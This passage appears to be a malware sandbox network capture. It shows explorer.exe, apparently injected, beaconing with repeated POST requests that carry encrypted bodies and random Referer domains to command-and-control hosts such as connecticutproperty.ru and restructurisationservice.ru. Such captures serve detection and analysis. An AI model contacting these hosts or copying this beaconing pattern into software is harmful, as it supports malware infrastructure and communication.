                                            14 | 192.168.2.5 | 49947 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:38.862231970 CET | 278 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://qjvjeavryrj.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 265
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:38.862231970 CET | 265 | OUT | Data Raw: (binary request body)
                                            Dec 19, 2024 10:59:40.196259022 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:39 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            15 | 192.168.2.5 | 49953 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:41.194796085 CET | 285 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://jisidxjkipgcbgc.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 316
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:41.194829941 CET | 316 | OUT | Data Raw: (binary request body)
                                            Dec 19, 2024 10:59:42.558610916 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:42 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            16 | 192.168.2.5 | 49958 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:42.688040018 CET | 287 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://uloowasjyvbxjte.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 324
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:42.688106060 CET | 324 | OUT | Data Raw: (binary request body)
                                            Dec 19, 2024 10:59:44.049314976 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:43 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            17 | 192.168.2.5 | 49964 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:44.194433928 CET | 281 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://jghirgxdfdtfej.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 264
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:44.194447041 CET | 264 | OUT | Data Raw: (binary request body)
                                            Dec 19, 2024 10:59:45.534571886 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:45 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            18 | 192.168.2.5 | 49970 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:46.558182001 CET | 284 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://aemrvdevcrdbnu.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 130
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:46.558239937 CET | 130 | OUT | Data Raw: (binary request body)
                                            Dec 19, 2024 10:59:47.910084963 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:47 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            19 | 192.168.2.5 | 49973 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:48.040641069 CET | 285 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://caegqqrnvwyec.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 273
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:48.040652037 CET | 273 | OUT | Data Raw: (binary request body)
                                            Dec 19, 2024 10:59:49.390717983 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:49 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            20 | 192.168.2.5 | 49977 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:49.522432089 CET | 280 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://gnjdvgwpgdpin.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 200
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:49.522479057 CET | 200 | OUT | Data Raw: (binary request body)
                                            Dec 19, 2024 10:59:50.862988949 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:50 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            21 | 192.168.2.5 | 49993 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:55.240689993 CET | 283 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://randrxuiexkkd.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 264
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:55.241559029 CET | 264 | OUT | Data Raw: (binary request body)
                                            Dec 19, 2024 10:59:56.609649897 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:56 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            22 | 192.168.2.5 | 49995 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:56.737485886 CET | 284 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://egkbqdynffoi.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 166
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:56.737519979 CET | 166 | OUT
                                            Dec 19, 2024 10:59:58.091754913 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:57 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            23 | 192.168.2.5 | 50000 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 10:59:58.232085943 CET | 279 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://jkpvubjbjugu.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 116
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:58.232085943 CET | 116 | OUT
                                            Dec 19, 2024 10:59:59.568881035 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:59 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            24 | 192.168.2.5 | 50001 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:04.837919950 CET | 285 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://pekwfbrjnpwbirs.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 326
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:04.837968111 CET | 326 | OUT
                                            Dec 19, 2024 11:00:06.200352907 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:05 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            25 | 192.168.2.5 | 50002 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:06.324534893 CET | 287 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://rllvcebkwfymagl.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 260
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:06.324534893 CET | 260 | OUT
                                            Dec 19, 2024 11:00:07.849044085 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:07 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            26 | 192.168.2.5 | 50003 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:07.973406076 CET | 281 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ylfiqfbsvxsdiv.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 306
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:07.973427057 CET | 306 | OUT
                                            Dec 19, 2024 11:00:09.309182882 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:09 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            27 | 192.168.2.5 | 50004 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:14.047979116 CET | 282 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ggphwqihuaca.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 269
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:14.048084021 CET | 269 | OUT
                                            Dec 19, 2024 11:00:15.431368113 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:15 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            28 | 192.168.2.5 | 50005 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:15.556154013 CET | 286 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://nbcjwexjjibiqt.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 244
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:15.556154966 CET | 244 | OUT
                                            Dec 19, 2024 11:00:16.925323009 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:16 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            29 | 192.168.2.5 | 50006 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:17.052778959 CET | 280 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://tjeuikagddjvc.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 125
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:17.052819967 CET | 125 | OUT
                                            Dec 19, 2024 11:00:18.386399984 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:18 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            30 | 192.168.2.5 | 50007 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:22.247304916 CET | 284 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://yylbqgigqdkmsn.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 266
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:22.247355938 CET | 266 | OUT
                                            Dec 19, 2024 11:00:23.618141890 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:23 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            31 | 192.168.2.5 | 50008 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:23.743700027 CET | 283 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ufirisacqvk.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 166
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:23.743736982 CET | 166 | OUT
                                            Dec 19, 2024 11:00:25.092927933 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:24 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            32 | 192.168.2.5 | 50009 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:25.219163895 CET | 279 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ipingdnctvhe.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 333
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:25.219197035 CET | 333 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be fa 18 67 92
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)gj]&dPG(8Bj[>\^.Az0sCWqlaZK'jHyxor'AV;KooJ^/bP\v-`Nuv=4m+Uo;jf3
                                            Dec 19, 2024 11:00:26.560724974 CET | 300 | IN | HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:26 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            33 | 192.168.2.5 | 50010 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:30.533154964 CET | 284 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://xvohygrorigngv.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 248
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 11:00:30.533186913 CET | 248 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be fe 55 28 de
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)U(2L8Ub\4e{36q"3Ej~g\DDu3_qJ}rf_g..N6A>wq~]sjlMtH=^k%`[wndIp^&D
                                            Dec 19, 2024 11:00:31.889817953 CET | 595 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:31 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            34 | 192.168.2.5 | 50011 | 94.156.177.51 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:32.014364004 CET | 283 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://iqmcbtituxk.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 331
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 11:00:32.014384985 CET | 331 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 88 54 59 d0
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)TYziAe^}x]aO}@*lm#1|/E-K\v~0QMNvyFqdY2C5;Qf*~Ga&|O?u{'|9J^s[WmgCr
                                            Dec 19, 2024 11:00:33.379775047 CET | 597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 10:00:33 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            35 | 192.168.2.5 | 50012 | 194.85.61.76 | 80 | 1028 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Dec 19, 2024 11:00:33.505337000 CET | 280 | OUT | POST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://rfcnfamftxutm.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 335
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 11:00:33.510246992 CET | 335 | OUT | Data Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 9c 46 3d d9
